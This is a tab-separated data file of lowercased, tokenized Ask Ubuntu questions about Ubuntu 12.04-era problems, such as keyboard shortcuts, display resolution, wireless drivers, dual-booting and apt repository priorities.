135201	curly brackets do n't work on a toshiba satellite a500d-111	*problem solved * i had to enter the options menu in keyboard layout settings . then choose `` key ( s ) to change layout '' , and check the `` right alt '' alternative . but thanks anyway for all the great answers/comments to this question ! : - ) when i installed ubuntu 12.04 , curly brackets no longer worked . i then reinstalled 12.04 , and everything worked fine until i hooked my laptop up with my apple wireless keyboard . i then found out that all the keybindings with alt/meta was gone . this is the output from xev when altgr + 7 is pressed : keypress event , serial 35 , synthetic no , window 0x3200001 , root 0xc4 , subw 0x0 , time 73403321 , ( 208,74 ) , root : ( 1114,151 ) , state 0x0 , keycode 108 ( keysym 0xffea , alt_r ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keypress event , serial 35 , synthetic no , window 0x3200001 , root 0xc4 , subw 0x0 , time 73403396 , ( 208,74 ) , root : ( 1114,151 ) , state 0x8 , keycode 16 ( keysym 0x37 , 7 ) , same_screen yes , xlookupstring gives 1 bytes : ( 37 ) `` 7 '' xmblookupstring gives 1 bytes : ( 37 ) `` 7 '' xfilterevent returns : false keyrelease event , serial 35 , synthetic no , window 0x3200001 , root 0xc4 , subw 0x0 , time 73403471 , ( 208,74 ) , root : ( 1114,151 ) , state 0x8 , keycode 108 ( keysym 0xffea , alt_r ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 35 , synthetic no , window 0x3200001 , root 0xc4 , subw 0x0 , time 73403484 , ( 208,74 ) , root : ( 1114,151 ) , state 0x0 , keycode 16 ( keysym 0x37 , 7 ) , same_screen yes , xlookupstring gives 1 bytes : ( 37 ) `` 7 '' xfilterevent returns : false anyone know what to do ? i have disabled the function where the alt-key shows the hud in unity . things i have tried : the lsusb did not show me any keyboard . i use the apple wireless keyboard , with norwegian ( macintosh ) keyboard layout . all the keys are recognized so it seems like its just the combination that dont work anymore . the same happened with alt+tab , but i just had to change some things in the compiz-settings . i also tried the onscreen keyboard , and pressed altgr + shift , that made it possible for me to use brackets++ .
135207	how can i make my ubuntu 12.04 auto-shutdown when battery is fully charged ?	i would love if someone could give me a script or something like that to make it do what i describe in the title ...
135209	how do i get 1366x768 resolution on my hp pavilion g6 ?	i 've recently installed ubuntu 12.04 via wubi , and have so far been unsuccessful in configuring the system to allow a 1366x768 screen resolution . the platform is an hp pavilion g6-1d73us with intel hd graphics 3000 , and in windows 7 the highest resolution is 1366x768 . please let me know what specific information is needed to diagnose this problem , and i will be happy to report back here .
135212	why do i have problems seeing youtube ?	recently i moved to ubuntu , i had windows . in windows i could see very comfortable , but now in ubuntu i ca n't . in the videos now , the picture and sound are out of sync . often you ca n't see the videos of the hughe out of sync . i have a good computer , lenovo g550 with 250gb memory and 4gb of ram
135214	pipable command to print in color ?	i 'm a bit new to bash scripting , and i 'm wondering if there is a program or built-in command to pipe to that will print in a specified color ? or is there an echo argument to do so ? like i could do : echo hi | commandhere -arguement blue and it would print `` hi '' in the color blue ?
135217	how to replace/fix a messed up /bin/sh and /bin/dash	i have corrupted my /bin/sh and have no idea how to replace it . i accidentally copied over it . how can i fix this ? i am running ubuntu server 11.10 , no x. update : i have tried the fix that was kindly offered by eliah but i think i copied over /bin/dash too ! update : output of cd /bin ; file sh dash bash ; md5sum sh dash bash sh : symbolic link to `dash' dash : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0x5d23ca7cbab4993f295d1089b4860eb32d406fab , stripped bash : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0xf199a4a89ac968c2e0e99f2410600b9d7e995187 , stripped c229085928dc19e8d9bd29fe88268504 sh c229085928dc19e8d9bd29fe88268504 dash 089ed56cd74e63f461bef0fdfc2d159a bash
135218	saving/applying gnome settings not working	i am unable to change any settings on my gnome setup , such as favorites in unity , adding extensions in gnome shell , etc.. it appears that the computer just ignores any settings . in gnome shell , i can apply settings , but they do n't do anything and the next time i open 'gnome-tweak-tool ' , the setting i just changed looks like i did n't change anything . as for unity , if i add an icon to 'stay in the launcher ' , it does have an effect ... until i log off and then it 's as if i never changed a setting . i 've searched all over and nothing seems to help . install path : ubuntu 12.04 beta 2 - > ubuntu 12.04 lts i 've tried : deleting my gnome settings new user ( it happens the same in the new user ) chowning the home dir recursively to the appropriate user . chmoding the home dir to 0777 .
135220	i can not revert completely to gnome-classic menus in 12.04	after installing the packages to be able to login to the gnome-classic desktop i only have the menus : applications and places in the gnome-panel , but there is no system menu with the preferences and administration menus . where are the system and the administration menus , can i get them back in gnome-classic 12.04 ?
135224	black screen on boot- only boots if usb connected	i installed ubuntu yesterday evening and finally got the grub menu up by putting the original usb loader in and changing the file line on boot that starts with linux to end in nomodeset . however although it now loads- its showing only half a screen . how do i fix this and how can i change the grub to load from the partition not the usb ? many thanks !
135226	empathy google talk with non google account	updated i use a live/hotmail account for my google services including google chat . in previous versions of empathy , i would specify the domain on my google talk account to talk.google.com and then it would accept my user name of whatever @ live.com and i 'd be able to talk to my contacts . this new version does n't seem to work the same . when i enter my connection info and try to connect , i get `` authentication failed for account # # # @ # # # '' and it asks me to re-enter my password . i 've no doubt in my mind that the password is wrong . what troubleshooting steps can i take to make this work correctly ? i 've gone into the /.mission-control/accounts/accounts.cfg and made sure that the parameters for my live mail account looked right . and they did . the username , and server were what they should be . everything is the same as another actual google account i used as a test to make sure it was n't just all google accounts .
135229	juju openstack keystone charm not found	i 'm trying to install openstack using juju on my local machine to test . i 'm following this guide however , i keep getting the following error : juju deploy -- config=openstack.cfg keystone 2012-05-10 16:19:14,494 info searching for charm cs : precise/keystone in charm store error processing 'cs : precise/keystone ' : entry not found 2012-05-10 16:19:15,116 error error processing 'cs : precise/keystone ' : entry not found
135230	different background or wallpaper per workspace ubuntu 12.04	i am using ubuntu 12.04 with unity 2d . i want to change the wallpaper per workspace , i came across few gconf editor related tutorials but is it possible in any other way ? does unity have it built in or i will have to hack it from these tutorials ? i want it to work on both unity2d and unity3d .
135231	use a clementine smart playlist to show duplicate songs	after switching to ubuntu , i discovered itunes had been storing duplicates of my music . e.g . highway to hell/ contains : highway to hell.mp3 highway to hell 1.mp3 girls got rhythm.mp3 girls got rhythm 1.mp3 ... etc not all of my music is like this , only some of it . my question is , is there a way i can create a smart playlist that : 1 ) finds if an album has duplicate tracks 2 ) finds if any of the duplicate track end in `` 1.mp3 '' 3 ) select only those tracks for the playlist . any help would be extremely appreciated .
135235	why is quickly ignoring the setup.py file in my project directory ?	whenever i try to package my application with quickly , the following error pops up in my terminal : and the package is in the directory . whoop de doo . then , when i go to open the .deb file in ubuntu software center to install it : the application can install fine but the description is messed up . what 's happening here ? i do have a 64-bit version of ubuntu , but does that make a difference ? i know that the setup.py file is fine : so whats going on ?
135236	`` drm : [ drm_crtc_helper_set_config ] *error* failed to set mode on [ crtc6 ] '' during install	i have a desktop pc which i built a while back . it has an athlon xp 2500+ , 2.5gb ram , and an nvidia ( pny verto ) geforce 6200 . i removed the cd drive to add another hard drive so i install from a usb flash drive . when i try to install 12.04 it seems to work just fine . the gui boots up and wifi even connects to my router . i go through the language screen , the partition screen , the keyboard screen , the location screen , and the import my windows settings screen just fine . but as soon as i 'm done with all that the next screen goes black and displays this message : drm : [ drm_crtc_helper_set_config ] *error* failed to set mode on [ crtc6 ] since the gui starts just fine earlier during the install , i know i should n't be having any display problems , but i am . how do i get ubuntu to install properly ? i have four ide hard drives , all western digital : a 250gb , a 160gb , a 40gb occupied by windows xp , and a 120gb that i 'm trying to use for ubuntu . 3gb of the 120gb drive are formatted for swap . i have checked the md5sum of install image file and it all matches up . d791352694374f1c478779f7f4447a3f ubuntu-12.04-desktop-i386.iso
135240	canon mg5300 series wo n't do duplex printing in 12.04	i upgraded an 11.10 32 ubuntu to 12.04 , and it has drivers that support the canon mp5300 series ( mine is a mg5320 ) . the mg5320 will print duplex ( two sides of one page ) , but not with the drivers that came with 12.04 . is there a way to get it to print in duplex ?
135249	error when trying to run an app with sudo or gksudo	i 'm not sure what happened . a few days ago i installed some updates and now i get an error whenever i try to run sudo nautilus . if i run gksudo nautilus it hangs for a few seconds then does nothing . anyone else had the same issue , or know how to fix it ? a similar thing happens when trying to run sudo gedit as well ... attempts to sudo other apps : sudoers as requested : $ display and sudo sudo -v as requested :
135256	is syncing private keys a good idea ?	ubuntu one 's security faq indicates that canonical encrypts connections and restricts access to user data . this all well and fine , and i do trust ssl for online banking and other things more valuable than my private keys . that said , i am quite anxious about putting my ~/.ssh/id_dsa up in the cloud . obviously , no system is totally secure . could some knowledgeable party , then , pragmatically quantify the risks ?
135267	what 's the difference between kde packages ?	so i 'm going to install kde in precise . i found that there was n't an entry for plasma desktop ( only kde apps ) in the software center , so i fired up synaptic to look for the packages . however , now i 'm finding way too many of these . there 's kde-standard , kde-workspace , plama-desktop , plasma-netbook , kde-plamsa-desktop ... i went and looked online , but with differing instructions , too . i think the most common were between `` install kubuntu-desktop '' and `` add the kubuntu-ppa/backports repo '' ( which is probably not the one i want ) . my question is ... what 's with all these different packages ? is there any difference between them ? which one should i install ?
135268	is there a simple way to visualize a spreadsheet in terminal or as clear text ?	i want to be able to easily show a simple text-only representation of a spreadsheet ( calc or excel ) via the command line ( so i can pipe that output to usual linux text manipulation tools ) . is there a tool or quick way of accomplishing that ? here 's an example of how such output could look like : a b c d e sales month 1000 jan 5000 feb 8000 mar 2300 total
135271	why will ubuntu 12.04 boot but not install ?	i can boot the disk but when it gives me the 5 options -try ubuntu without installing -install ubuntu -check disk for defects -test memory -boot from first hard disk i select the `` install ubuntu '' option then it just restarts . thanks in advance
135272	how to boot into windows 7 when grub is installed in the windows partition ?	original title : how can i solve ( un ) booting windows 7 on the same partition with grub ? i 've been researching for 2/3 days about this problem and i have came up empty . basically , partition 1 is windows 7 and partition 2 is ubuntu 12.04 . i told ubuntu to install into partition 2 and to install grub on partition 1 and that works fine . but the problem now is that i ca n't boot to windows 7 . it just returns to the grub menu after i select it . from what i have researched , if i can edit grub to boot windows 7 `` mbr '' or the bootloader \windows\system32\winload.exe ( without using windows 7 repair disk ) , my problem will be solved . is this even possible ? the url from boot-repair-info is http : //paste.ubuntu.com/981952/ output from the command sudo blkid /dev/sda1 : uuid= '' 1ea0019aa0017a13 '' type= '' ntfs '' /dev/sda2 : uuid= '' e4402f9e-83df-4dc3-8913-69b28314d253 '' type= '' ext4 '' /dev/sda3 : label= '' vault drive '' uuid= '' 74145bfd145bc132 '' type= '' ntfs '' /dev/sda4 : uuid= '' 1c030d32-657f-4a78-9468-307d9e09a977 '' type= '' ext4 ''
135275	missing java plug ins with u.s. patent office web site	i am trying to utilize the u.s. patent web site and i am unable to view the publication images as the site states that i need to download a missing plug-in for firefox . when i select the missing plug-in button i receive `` no suitable plug-ins found '' . i made sure that i have the most recent version of java from the ubuntu software center , restarted my browser , but yet have not been able to get this to work . the link i am trying is here . any suggestions ? thank you in advance !
135276	pop-up notifications not showing when using xchat	i use xchat for irc , and by default , xchat does n't show pop-up notifications ( unlike growl in mac , which shows pop-up notifications ) whenever something is posted on the message box . is there a way to show these notifications , or is it not possible at all ?
135277	how to see whether installed cuda is 32-bit or 64-bit ?	is there any command or any file in the cuda directory which can answer this question ?
135280	ipv4 address sharing issue ? trying to map ipv4 address from host os to bt5 vm	i 'm having a general networking issue in regards to my backtrack 5 ( x64 ) kde vm in virtualbox . the vm appears to be on a separate subnet , but for my purposes , i 'd like to include the vm in the private class c network ( 192.168.x.x ) . do you know why the vm is using a class b private address as opposed to a class c ? my understanding with nat is that the system would use a single ipv4 address to connect the virtual machine to the network . how can i change the vm config . so that i can access the 192.168.x.x subnet ? technical details of vm/network config . using nat adapter from virtualbox to communicate w/lan nmap scan of 10.0.2.1-254 returns 5 active hosts on lan i 'm trying to : use nmap to perform a scan of the 192.168.2.x subnet the issue : can only scan lan if querying 10.0.2.1-254 , should n't i be querying 192.168.2.1-254 ? command used : nmap -sp 10.0.2.1-254 windows 7 x64 ( host ) windows ip configuration ... physical address . . . . . . . . . : ec-55-f9-c8-67-38 dhcp enabled . . . . . . . . . . . : yes autoconfiguration enabled . . . . : yes link-local ipv6 address . . . . . : fe80 : :f9cc : d2f8 : a30d:15b0 % 12 ( preferred ) ipv4 address . . . . . . . . . . . : 192.168.2.4 ( preferred ) subnet mask . . . . . . . . . . . : 255.255.255.0 default gateway . . . . . . . . . : 192.168.2.1 dhcp server . . . . . . . . . . . : 192.168.2.1 backtrack 5 virtualbox vm ( guest ) root @ bt : ~ # ifconfig eth0 eth0 link encap : ethernet hwaddr 08:00:27:40 : ed : f7 inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe40 : edf7/64 scope : link up broadcast running multicast mtu:1500 metric:1 ...
135281	shared folder settings do not persist in ubuntu 12.04 guest on vmware player/windows	using vmware player 4.0.3 on windows 7 64bit , with ubuntu 12.04 as my guest os . i installed open-vm-tools , based on the instructions at https : //help.ubuntu.com/community/vmware/tools . i had to create the hgfs directory sudo mkdir /mnt/hgfs so that shared folders would work , and they did , at least until i rebooted the guest . if i disable the shared folders and re-enable , then they work again , until i reboot the guest . how can i get vmware shared folders to persist past a reboot ?
135290	how do i share files between two computers ?	pulling my hair out trying to find out how to share files between a ubuntu 12.04 laptop and a lubuntu 11.10 desktop . forum searches do not yield specific enough suggestions or do not seem to apply to my version ( where is menu > places , in 12.04 ? ) . i would greatly appreciate some help .
135297	how do i make modprobe permanent ?	for my wireless adapter ( inside my computer ) to enable it , i run modprobe b43 and that turns it on . but , when i reboot it goes back to no device . so , how do i make this totally permanent ?
135299	how do you revert to a professional colour chooser in 12.04 ?	when i want to choose a colour for the desktop background or for the terminal 's profile , for example , the program is like a program for kids . you ca n't choose the colours according to value , saturation , hue etc . with precision and fast , as with a professional colour chooser , like it was before . so , is there a way to change the kids-like colour chooser for a professional colour-chooser ?
135301	how can i stop apache2 form starting at startup without removing it ?	i dont want to remove apache2 as i it is the dependency of debian document browser . how can i stop it from starting at startup ?
135304	which file holds the path settings ? what are the difference between windows and ubuntu path setting ?	how can i change them by directly editing the file ? echo $ path returns this : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games
135305	how can i programmatically change the keyboard layout ?	i want to run a shell command or script that will configure each of my ubuntu precise boxes to use the dvorak keyboard layout as the default ( and only ) layout . with earlier versions , i was able to set the xkbvariant in /etc/default/keyboard but when i make this change in precise ( and reboot ) , the keyboard layout appears to be unaffected ( both in console and in gnome ) . i tried also setting the xkbmodel to pc105 and xkblayout to us , but that did not seem to help . i know i can set the layout for gnome using the 'keyboard layout ' tool ... but i want the change to affect the console , and i want to automate the process . how can i accomplish this ? edit : to clarify , i want to know how i can cause to change ( using only a script or command-line ) the keyboard layout to be dvorak as the default and only keyboard layout for both gnome and the console . i want this change to be persistent ( survive reboots ) , just as it is when the change is made through the keyboard layout tool . edit : let me put it another way . if i had installed the operating system myself ( which i did not because the os was installed by the virtual machine infrastructure ) , i could have selected the desired keyboard layout at install time , and that layout would be applied persistently , system-wide . how can i change the layout to appear as if i had set it during the install process ?
135313	when is google drive going to be released on ubuntu ?	does anyone have any information on when google drive app will be released for ubuntu linux ?
135314	change gnome panel hiding sensibility ubuntu 10.04	how are you ? i have some expresivity problem because of my english , but i 'll try my best here . i would like to know if there 's a way to change the sensibility ( or response ) of the gnome panel when the `` autohide '' ( i 'm using a spanish version because i 'm from argentina so i dont really know what this option is called ) option is enabled , because every time i hover over that area it keeps coming up when i do n't really need it . i hope i 'm being clear , if not please let me know and i 'll try to explain myself better . thanks folks , and have a nice day .
135316	upgrade manager does not start upgrading	i ca n't upgrade to 12.04 lts because whenever i click upgrade on the update manager , the update manager turns gray and fails . why is this . whenever i click the upgrade button , the whole update manager turns gray and stops operating . what could be going wrong ?
135322	ubuntu12.04 gtk+ theme problem	i try to install a gtk3 theme called 'a new start ' following the instructions on some websites , but when i change the gtk+ theme by using tweak tool , my font turns white and it 's really horrible ... has anyone got a solution ? or have you ever got the same problem ?
135325	missing mp3 disc burner on ubuntu/linux	every thread i went to told me , to burn mp3 disc i have to select data disc in brasero or in other burning app . this is not true , i have wasted my cd ten times just to burning a working mp3 disc . it plays with some of my player but not all . to burn an mp3 disc with data mode on brasero or other app is absolutely dumb . on windows , it has ashampoo burning studio free . it lets you burn mp3 disc that can be play on all player in one mode , and another mode that 's pc/data mode which just copy mp3 files to disc . i have tested both mode , the same player which ca n't play the disc burnt in pc/data mode can play the same mp3 files burnt in mp3 disc mode . it 's also described in the app that mp3 disc burnt in pc/data mode can only be play on pc . if there 's an app that can burn an actually mp3 disc , please tell me . thanks .
135327	disable the cdrom in ubuntu 11.10 os	can anyone help me how to disable the cdrom in ubuntu 11.10 os level . i tried searching google but i could not find any solution .
135333	how can i find out what site a popup ad came from ?	this is the situation : i 've been browsing the web for an hour in pursuit of some bit of technical information and have visited several dozen websites that i do n't even remember anymore . i 've finally found what i need so i start closing the web browser , only to discover that — aaargh ! — there 's a popup ad hiding underneath ! my blood boils . what insidious website is responsible for this circumvention of my browser 's popup blocker ? i want to make it pay for its crime . i 'll write angry emails . leave bad reviews . even block it from my google search results — yes , that 'll show it ! but i 've reached an impediment . the offending site has already been closed . is it too late to deduce the advertisement 's origin ? or can i somehow un-pop the popup ? details i 'm asking about the case in which i have not been taking unusual preemptive actions . watching my past browsing activity by any means that is n't operative by default is not an option . here 's a test page . with only the popup left on your screen , can you deduce that it was caused by visiting pastehtml ? out of curiosity , i tried using collusion to track my test popup . it did n't show any relationship between the popup and its origin :
135337	`` internet not working '' message , when i try to update ubuntu , when internet is working fine	i am getting the message internet not working when i try to update ubuntu . failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-3.0.0-19-generic_3.0.0-19.32_i386.deb 404 not found [ ip : 91.189.92.193 80 ] failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-3.0.0-19_3.0.0-19.32_all.deb 404 not found [ ip : 91.189.92.193 80 ] but my internet is working fine , since i am able to download all files via internet .
135339	assign highest priority to my local repository	summary how can i make apt-get prefer local repository packages instead of downloading again the same package version from official repositories ? the local repository is signed and trusted . we 've already tried apt preferences priority . original question was : `` how to assign highest priority to local repository without using sources.list file '' i have setup a local repository with packages i downloaded . i use it to avoid downloading the same packages over the internet , when i need to reinstall my ubuntu . it is a basic repository , created with apt-ftparchive packages . > packages . i made this a trusted repository to avoid `` unauthenticated repository '' warning . ( when you have a untrusted repository , apt or synaptic try to download the same packages over the internet , 'cause it is trusted ) . i have been using this local repository for at least 1 years . but i have to always put my local repository line at the top of the sources.list file to use this . but this is annoying , since i must open a terminal and do some typing on it every time i reinstall ubuntu , though there is a better tool software-properties-gtk . i can not use this tool since it place the source line at the end of `sources.list . and the real problem is that , the apt or synaptic always download a package from the source which is mentioned earlier , without inspecting whether the packages are already available in the local repository . so , i have no choice but to place the local source at the top of sources.list doing terminal ( i actually do n't hate terminal , but i need a solution ) . i have tried this method . but this does not help me . my preference file is this in /etc/apt/preferences.d/local-pin-900 package : * pin : release o=local , n=ubuntu-local pin-priority : 900 my release file is this origin : local label : local-ubuntu description : local ubuntu repository codename : ubuntu-local md5sum : ed43222856d18f389c637ac3d7dd6f85 1043412 packages d41d8cd98f00b204e9800998ecf8427e 0 sources when i enable the apt-preference , the apt-cache policy correctly shows the preference , e.g . it shows the local repository has the highest priority . but when i do this sudo apt-get install < package-name > , apt tries to download it from internet . but when i place my local-repo at the top , it installs from local repository . so , my question is - > 'is it possible to force apt to use local repository when the package is available in local repository , without explicitly placing `` the local source '' at the top of my repository list ( e.g sources.list file ) ? ' edit : output of apt-cache policy $ package_name is as follows nautilus-wipe : installed : ( none ) candidate : 0.1.1-2 version table : 0.1.1-2 0 500 http : //archive.ubuntu.com/ubuntu/ precise/universe i386 packages 900 file : /media/main/linux-software/ubuntu/precise/ packages it is showing that my local repository has higher preference , though it is not the one which comes first in sources.list file . here is the output of apt-get install nautilus-wipe reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : nautilus-wipe 0 upgraded , 1 newly installed , 0 to remove and 131 not upgraded . need to get 30.7 kb of archives . after this operation , 150 kb of additional disk space will be used . 'http : //archive.ubuntu.com/ubuntu/pool/universe/n/nautilus-wipe/nautilus-wipe_0.1.1-2_i386.deb ' nautilus-wipe_0.1.1-2_i386.deb 30730 md5sum:7d497b8dfcefe1c0b51a45f3b0466994 it is still trying to get the file from internet , though i think it should be happy with the local one . result of using `` '' or localhost as mediageek suggested using localhost has no effect . but `` '' has but was not different than my method package : * pin : origin `` '' pin-priority : 1001 i have used them before posting the question . but again i tried this ( for surity ) . the same result . apt-cache policy showing that my local repository has indeed the highest priority . but when i tried to install it is saying `` need to get xxx/xxx kb of archive '' .
135346	how to control cpu fan with no pwm-capable sensors ?	i 've tried to follow the directions on this thread : how to control fan speed ? but at the end of the day , pwmconfig gives me this error : /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed is there anything i can still do to control my cpu fan speed ? i have the same machine so here the output of the request : marco @ marco-linux : ~ $ sudo lshw -c system [ sudo ] password for marco : marco-linux description : all in one product : imac11,1 ( ) vendor : apple inc. version : 1.0 serial : w80184dt5pj width : 64 bits capabilities : smbios-2.4 dmi-2.4 vsyscall32 configuration : boot=normal chassis=all-in-one family=imac uuid=d2fe9523-6304-3457-a5d0-9e895170b482
135348	resolution goes to 640x480 after disabling kms	this ubuntu 12.04 box happens to freeze all of a sudden under regular usage - anything seems to be able to make it freeze . in one effort of seeing what could fix it , i 've disabled kms ( kernel modesetting ) , as recommended here . in my case , it is : echo options nouveau modeset=0 > /etc/modprobe.d/nouveau-kms.conf since this is an nvidia geforce2 integrated ( on-board ) card on an old motherboard ( a7n266-vm ) . and after it restarts , the only resolution avaliable is 640x480 , while before , it could do 1024x768 . i want to know if disabling kms fixes my problem , so : how can i have the correct ( 1024x768 ) resolution with kms disabled ?
135351	how do i enable wireless on a dell vostro 3400	i am using dell vostro 3400 pc . previously i was running ubuntu 11.10 version . recenty i have upgraded it to 12.04 version . the sad part is wireless is disabled now and i am unable to connect internet . how to enable wireless ?
135352	how do i remove the heroku cloud application platform repository ?	i am having problem with heroku cloud platform . i am having problem with /etc/apt/sources.list.d in this directory the heroku file have been saved . i installed it via terminal using sudo apt-get install heroku .
135354	why do i get a kernel panic when rebooting after installing via wubi ?	i installed ubuntu from windows . when it tried to reboot , the computer started with the following text on the screen : init [ 1 ] : segfault at ... . kernel panic - not syncing . attempted to kill init ! ... ... . panic occurred , switching back to text console the computer then failed to start until i rebooted from a boot cd . it then opened normally in windows . i installed from : ubuntu.com/download/desktop/windows-installer ubuntu desktop 12.04 lts my hardware is as follows : os name : microsoft windows 7 professional version : 6.1.7601 service pack 1 build 7601 processor : pentium ( r ) dual-core cpu e5500 @ 2.80ghz , 2803 mhz , 2 core ( s ) , 2 logical processor ( s ) video controller : nvidia geforce 8400 gs i have not tried rebooting again .
135356	no back light on my acer aspire 5734z	i installed ubuntu ( 12.04 ) on my acer aspire 5734z and the back light stopped working . i have tried the fix by editing the grub file posted on here a couple of days ago but that has n't fixed it . i have also looked for hardware drivers but that did n't get me anywhere . when i hook up an external monitor it works fine but i have been unsuccessful getting the laptop display to light up . thanks edit removed link i found a fix here `` http : //crunchbanglinux.org/forums/post/66562/ # p66562 `` if anyone has a better fix than the one in that post , let me know .
135364	no wireless 12.04	installed 12.04 on hp laptop with wireless hardware switch . apparently no driver included in 12.04 , and ca n't find one via driver update . worked fine with 10.04 and win xp . seems to me that broadcom b43 is what worked with 10.04 but i 'm not absolutely sure about that . ideas ?
135368	how best to read the man pages ?	when reading man pages , a lot of extra characters are shown on screen . which of the following commands can help to deal with this problem ? grep pg more row col i think it 's more but i 'm not sure .
135372	installation is failing	i posted a youtube video explaining what 's wrong . any help would be awesome ! http : //www.youtube.com/watch ? v=yqgwmwt5n-q
135378	how can i disassemble or decompile a c++ executable ?	is there any tool like dumpbin ( for windows ) in ubuntu which can disasssemble ( produce machine code ) for an executable file ?
135380	sound menu keyboard shortcuts are n't working with vlc . work fine with rhythmbox/banshee	i enabled vlc dbus interface : is there a way to control vlc from the sound menu ? vlc now appears in the sound menu and the controls work . however , the keyboard shortcuts configured for the media player ( system settings - > keyboard - > shortcuts - > sound and media ) for play , `` next track '' and `` previous track '' are n't working . they work fine with banshee .
135381	interrupted upgrade to 12.04 - `` no upgrade possible '' - how to fix ?	the upgrade to `` precise '' was interrupted , and if i try to upgrade now , i get the message : '' no upgrade possible with this tool '' where do i find the tool required to upgrade ?
135402	system black screen after updating to 12.04	after updating from 10.04 to 12.04 through the update manager i get the black screen shown here photo of the boot process ... [ edit : ] sorry for misspelling ... the correct link is shown above ! at that point i can hear the login screen 's drums and the mouse pointer shows up ! in order to be able to login , i have to press ctrl+alt+f7 twice and the log-in screen displays normally . after login in no other nothing strange happens ! kernel version is 3.3.4-030304-generic-pae ( installed through deb package manually ) and this problem does not occur under 2.6.x kernel series ... how will i make the log-in screen to show up instead of this black one ... ?
135403	tipp10 wo n't launch in 12.04	i downloaded the .deb from the official website tipp10 and installed it via the ubuntu software center . however the app fails to launch from dash , launcher and the terminal . terminal gives me this message when i try to launch from the it : ./tipp10 : error while loading shared libraries : libsm.so.6 : can not open shared object file : no such file or directory what can i do to rectify this problem . thanks in advance
135407	12.04 user-account not listed	after incremental updates from 10.10 , to 12.04 , go back to gnome rather than unity , and some troubleshooting , i can use my 12.04 , but i need to use gdm to `` gui '' -log into my session ( no problem to login via tty ) . in 11.10 , lightdm did n't show my user , but i could specify it and still log in . in 12.04 , i had no possibility in lightdm to specify my user . so i found a temp workaround : use gdm as default-display-manager and so i can specify my account to log into ubuntu . when in system settings/system/user accounts , my user is not listed ( user-id = 601 ) how could i troubleshoot this ? the goal is to get my account listed in the `` gui '' list of user accounts , and so go forward to lightdm . thanks for tips .
135414	menus disappear on changing compiz settings	i installed compizconfig on ubuntu 12.04 , and was changing the desktop effects , suddenly all menus disappeared , i ca n't even open terminal . i restarted several times . when i tried ctrl+alt+f2 , logged in and typed unity -- reset , it displays lot of error messages ( i do n't understand what they are ) , and finally says 'segmentation fault ' . other accounts on the system are working fine . i need help.. ! !
135421	ca n't launch bluetooth file browser due to missing `` obex_thunar.sh '' file	on my dell studio 1550 laptop : i have xubuntu installed . i succesfully paired the device . now when i click on `` browse files on device '' i get this message : failed to launch `` obex_thunar.sh '' [ errno 2 ] no such file or directory you can enter an alternate browser in service settings on my friends laptop ( latest ubuntu installed and up to date ) , when you click `` browse files on device '' actually nothing happens ... please help !
135424	ca n't open any libre office docs in 12.04	this error message pops up when opening a document in libreoffice : libreoffice 3.5 read-error . an unknown error has occurred . i can , however , open a fresh new document . this is obviously not desirable behaviour . edit : i tried opening a calc doc which i used in my 11.04 installation ( which is now 12.04 ) . the documents are as they always were , in my documents folder . impress files seem to open fine . i 've not yet tried a writer file yet , as i do n't use them too often . what is the problem ?
135425	keyboard shortcuts do n't work in gnome shell	after upgrading to 12.04 the keyboard shortcut of the windows manager ( metacity ) such as my custom alt+1 , alt+2 for desktop switching but also the default alt+f10 for maximizing window stopped working in gnome shell . anyone knows what might be the cause and/or remedy ?
135426	what is lilo and its uses ?	i 'm basically looking for information so i can learn what lilo is . i recall trying to dual-boot ubuntu with windows and not being able to get into windows . i had just wanted to get back my windows after that . so any information to helping me learn about lilo is appreciated . thanks !
135428	what are the benefits of sudo over su ?	what is the actual benefit that ubuntu ( or debian derivatives ) achieve by disabling root user . everywhere i read , its says to prevent unintentional damages for inexperienced users . i want to know what exactly . since sudo can execute all commands ( that i know/ use ) . so in what case root can cause damage whereas sudo ca n't ? ps : i know how sudo works .
135437	install artwiz fonts in ubuntu 12.04	i am trying to install the artwiz fonts in ubuntu 12.04 and following this thread . but xfonts-artwiz2 package does n't exist in 12.04 . also the thread is too old ! i am trying to install the osnap font . how can i install this font in 12.04 ?
135438	using sudo aptitude/apt-get update does not work	trying to update via terminal via aptitude or apt-get is not working . there is no other package management program running in the background or any other user . i tried both , sudo aptitude update and sudo apt-get update just in case . same problem . trying to do it via update manager throws this output : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/release.gpg something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) internet connection is working since i could create this question . tried to do : a sudo rm /var/lib/apt/lists/* -fr but it only helped in executing both apt-get and aptitude to see them fail again at the end with the same problem . what else could be locking the list ?
135440	usb keyboard not working after upgrading to ubuntu 12.04	yesterday i upgraded to ubuntu 12.04 , upon the upgrade completing my usb keyboard would not work . my usb mouse works fine and i have tried 3 different keyboards in all of my usb ports as well as a ps2 keyboard .
135448	ubuntu one ca n't connect : `` root mismatch ''	there was a problem with a previous account of mine , so i created a new one . ( there 's hardly anything in it , so i figured creating a new account is n't a problem . ) in fact , i 'll gladly close that account , if i knew how , and use only my newly created one . i 'm struggling to the ubuntu one application . i 've managed to get it to see my new account name and email address , but when i try connect , the above screenshot appears . how do i fix this ? edit : as a matter of interest , i found where to close my previous account . so , now i have this ( and only ) account running , but as i said above , it wo n't connect .
135451	how to auto-start jboss as 7.1.1 in ubuntu 12.04 ?	how to make jboss as 7.1.1 auto start in ubuntu 12.04 .
135454	installing ubuntu 12.04 on a seperate partition	i have a 320gb hp-mini netbook , which originally had 2 partitions ( c : ~300gb , and d : ( recovery ) ~20gb ) . i shrinked the c : drive , and created a 50gb unallocated partition , which i want to use for my ubuntu 12.04 installation , but onloading the ubuntu via usb , i 'm stuck as to how to actualize this .
